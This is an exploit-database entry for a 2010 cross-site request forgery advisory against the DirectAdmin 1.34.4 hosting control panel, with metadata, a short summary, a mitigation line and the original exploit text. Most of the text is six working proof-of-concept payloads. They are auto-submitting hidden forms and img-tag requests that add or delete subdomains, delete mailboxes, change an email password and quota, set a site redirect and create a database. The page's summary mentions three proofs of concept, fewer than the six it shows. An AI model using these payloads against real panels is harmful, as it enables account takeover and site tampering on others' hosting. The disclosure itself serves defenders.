Multi CSRF vulnerability in DirectAdmin (1.34.4)

vendor:

DirectAdmin

by:

K053

3,1

CVSS

MEDIUM

Cross-Site Request Forgery (CSRF)

352

CWE

Product Name: DirectAdmin

Affected Version From: 1.34.4

Affected Version To: 1.34.4

Patch Exists: NO

Related CWE: N/A

CPE: a:directadmin:directadmin:1.34.4

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Ubuntu

2010

Multi CSRF vulnerability in DirectAdmin (1.34.4)

DirectAdmin is a graphical web-based web hosting control panel designed to make administration of websites easier. Here, three proof-of-concepts (POCs) are listed which can be used to add/delete subdomains and emails. The POCs use a hidden form with the action set to the CMD_SUBDOMAIN or CMD_EMAIL_POP URL, and the action set to create/delete. The user must set the proper name instead of selectX, for example if the subdomain is at number 2 in the list, it should be set to select1.

Mitigation:

The application should ensure that all requests are validated and authenticated before performing any action. The application should also use anti-CSRF tokens to prevent CSRF attacks.

Source

Exploit-DB raw data:

=============================================================================
# Title : Multi CSRF vulnerability in DirectAdmin (1.34.4) 
# Date : 20-3-2010
# Version : 1.34.4
# Author : K053 [K053.Dev0te3 _AT_ gmail]
# Tested on : Ubuntu
# Vendor : http://www.directadmin.com/
# Download : http://www.directadmin.com/demo.html
=============================================================================
# info : DirectAdmin is a graphical web-based web hosting control panel 
         designed to make administration of websites easier.
-----------------------------------------------------------------------------
>> Here I have listed some poc , maybe you find more ;)		 
-----------------------------------------------------------------------------
# poc 1  : Add Subdomain | 
-------------------------
 <html>
 <title>Add subdomain</title>
 <form name="info" action="http://address:port/CMD_SUBDOMAIN" method="post">
    <input type=hidden name=domain value="domain_name">
    <input type=hidden name=action value="create">
	<input type=hidden name=subdomain value="test">
    <input type="hidden" value="Submit">
<body onload="document.forms.info.submit();">
</html> 
-----------------------------------------------------------------------------
# poc 2 : Delete Subdomain |
---------------------------
 <html>
 <title>Delete subdomain</title>
 <form name="del" action="http://address:port/CMD_SUBDOMAIN" method="post">
	<input type=hidden name=domain value="domain_name">
    <input type=hidden name=action value="delete">
	<input type=hidden name=contents value="yes">
	<input type=hidden name=[selectX] value="subdomain_name">
	<input type="hidden" value="Submit">
<body onload="document.forms.del.submit();">
</html>

Note : You msut set proper name stead selectx, for example if test subdomain
       is at number 2 in list, should set it select1.	   
-----------------------------------------------------------------------------
# poc 3 : Delete Email    |
---------------------------
 <html>
 <title>Delete Email</title>
 <form name="del" action="http://address:port/CMD_EMAIL_POP" method="post">
	<input type=hidden name=domain value="domain_name">
    <input type=hidden name=action value="delete">
	<input type=hidden name=selectx value="put_mail">
	<input type="hidden" value="Submit">
 <body onload="document.forms.del.submit();">
 </html>
 
Note : You msut set proper name stead selectx, for example if test Mail is at 
       number 2 in list, should set it select1.	   
-----------------------------------------------------------------------------
# poc 4 : Change Email Configuration   |
-----------------------------------
<img src=http://address:port/CMD_EMAIL_POP?action=modify&domain=domain_name&user
=username&newuser=username&passwd=mypasswd&passwd2=mypasswd&quota=0&update=Modify>

Note : Able to Cahnge quota, password & Name
-----------------------------------------------------------------------------
# poc 5 : Set Redirection  |
----------------------------
<img src=http://address:port/CMD_REDIRECT?domain=domain_name&action=add
&from=%2F&type=301&to=http://google.com

Note : Change from value if you want set redirection for specific direction.
-----------------------------------------------------------------------------
# poc 6 : Add Database   |
--------------------------
<img src=http://address:port/CMD_DB?action=create&domain=domain_name&name=b0f
&user=b0f&passwd=frenzy&passwd2=frenzy&create=Create>
-----------------------------------------------------------------------------